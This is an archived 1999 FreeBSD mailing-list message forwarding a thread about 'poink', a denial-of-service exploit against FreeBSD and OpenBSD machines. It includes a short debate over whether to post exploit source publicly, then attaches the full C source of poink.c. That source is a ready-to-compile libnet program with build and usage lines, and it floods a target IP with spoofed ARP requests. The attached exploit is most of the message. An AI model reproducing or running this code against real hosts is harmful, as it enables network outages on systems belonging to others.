Date: Mon, 19 Apr 1999 11:16:52 -0700 From: "William" <wwoods@cybcon.com> To: <alpha@freebsd.org> Subject: Fw: poink and freebsd Message-ID: <199904191818.LAA11482@mail.cybcon.com>
next in thread | raw e-mail | index | archive | help
This is a multi-part message in MIME format. ------=_NextPart_000_01BE8A56.201ACB40 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit ---------- > From: Harold Gutch <logix@foobar.franken.de> > To: Chris <freebsd@hiway1.exit109.com>; The Tech-Admin Dude <geniusj@phoenix.unacom.com> > Cc: security@FreeBSD.ORG > Subject: Re: poink and freebsd > Date: Monday, April 19, 1999 10:54 AM > ------=_NextPart_000_01BE8A56.201ACB40 Content-Type: application/octet-stream; name="muttIQ6439" Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="muttIQ6439" On Mon, Apr 19, 1999 at 01:10:08PM -0400, Chris wrote: > jd- >=20 > id rather not post the source to the list, since this is how exploits = get > distributed, and bad things occur. i sent email to the = security-officer, > and a few people to test it out with their setup.. id rather not > distribute it any further... i hope you understand my reasoning behind = it > :/ >=20 > > On Mon, 19 Apr 1999, Robert Watson wrote: > >=20 > > > On Mon, 19 Apr 1999, Chris wrote: > > >=20 > > > > im sure ya'll have heard of poink, an exploit against = freebsd/openbsd > > > > machines (these are the boxes i have tested on) it appears to = work very > > > > efficiently in killing freebsd 3.1 - freebsd 3.0 machines, = against one of > > > > our freebsd 2.2.5 machines, it did bring up the error messages = in > > > > /var/log/messages (arp lookups) but didnt kill the machine like = the > > > > others... > > > >=20 > > > > im just wondering if there are any patches for this, and i = noticed there > > > > is no mention of it on freebsd's website.... > > >=20 > > > Interestingly, I haven't heard about this one, and it doesn't = appear to be > > > on rootshell, etc. Chris, the fact that _you_ as somebody outside of the circles close to the original author (which I simply assume) already have it, shows that it already is public. Posting it to this list will distribute it to more people, some of which might use it maliciosly, others though might fix it faster than it would be fixed otherwise. Keeping it secret doesn't help anything, this is similar to proprietary programs/protocols, which in many cases are inferior to open source or open protocols. You should get some information about "full disclosure" and read it. Anyway, I was able to find the source for poink after searching for 5 minutes. As I don't have libnet installed (and I don't plan to install it just to compile poink), I am not able to say anything about what it does - perhaps somebody else can do so. bye, Harold --=20 <Shabby> Sleep is an abstinence syndrome wich occurs due to lack of = caffein. Wed Mar 4 04:53:33 CET 1998 #unix, ircnet ------=_NextPart_000_01BE8A56.201ACB40 Content-Type: application/octet-stream; name="poink.c" Content-Transfer-Encoding: quoted-printable Content-Description: poink.c (C File) Content-Disposition: attachment; filename="poink.c" /* * $Id$ * * poink.c - NT/9x DOS attack * * Code: * Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com> * route|daemon9 <route@infonexus.com> * All rights reserved. * * Original Idea: * Joel Jacobson (joel@mobila.cx) * * This simple exploit was written as per the specification from Joel * Jacobson's bugtraq post = (http://geek-girl.com/bugtraq/1999_1/1299.html). * * Needs libnet 0.99. * Currently: http://lazy.accessus.net/~route/libnet * Soon: http://www.packetfactory.net/ * * gcc poink.c -o poink -lnet * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in = the * documentation and/or other materials provided with the = distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' = AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR = PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE = LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR = CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE = GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, = STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY = WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY = OF * SUCH DAMAGE. * */ #include <libnet.h> u_char enet_src[6] =3D {0x00, 0x0d, 0x0e, 0x0a, 0x0d, 0x00}; u_char enet_dst[6] =3D {0xff, 0xff, 0xff, 0xff, 0xff, 0xff}; int send_arp(struct link_int *, u_long, u_char *); void usage(u_char *); int main(int argc, char *argv[]) { int c, amount; char errbuf[256]; char *device =3D NULL; struct link_int *l; u_long ip; amount =3D 20; while ((c =3D getopt(argc, argv, "n:i:")) !=3D EOF) { switch (c) { case 'i': device =3D optarg; break; case 'n': amount =3D atoi(optarg); break; default: exit(EXIT_FAILURE); } } if (!device) { usage(argv[0]); exit(EXIT_FAILURE); } if (argc <=3D optind) { usage(argv[0]); exit(EXIT_FAILURE); } else if ((ip =3D libnet_name_resolve(argv[optind], 1)) =3D=3D -1) { fprintf(stderr, "Cannot resolve IP address\n"); exit(EXIT_FAILURE); } l =3D libnet_open_link_interface(device, errbuf); if (!l) { fprintf(stderr, "libnet_open_link_interface: %s\n", errbuf); exit(EXIT_FAILURE); } while (amount--) { c =3D send_arp(l, ip, device); if (c =3D=3D -1) { /* bail on the first error */ break; } } printf("\n"); return (c =3D=3D -1 ? EXIT_FAILURE : EXIT_SUCCESS); } int send_arp(struct link_int *l, u_long ip, u_char *device) { int n; u_char *buf; if (libnet_init_packet(ARP_H + ETH_H, &buf) =3D=3D -1) { perror("libnet_init_packet memory:"); exit(EXIT_FAILURE); } /* * Ethernet header */ libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_ARP, NULL, 0, = buf); /* * ARP header */ libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, 6, 4, ARPOP_REQUEST, enet_src, (u_char *)&ip, enet_dst, (u_char *)&ip, NULL, 0, buf + ETH_H); n =3D libnet_write_link_layer(l, device, buf, ARP_H + ETH_H); fprintf(stderr, "."); libnet_destroy_packet(&buf); return (n); } void usage(u_char *name) { fprintf(stderr, "%s -i interface [-n amount] ip\n", name); } ------=_NextPart_000_01BE8A56.201ACB40-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-alpha" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199904191818.LAA11482>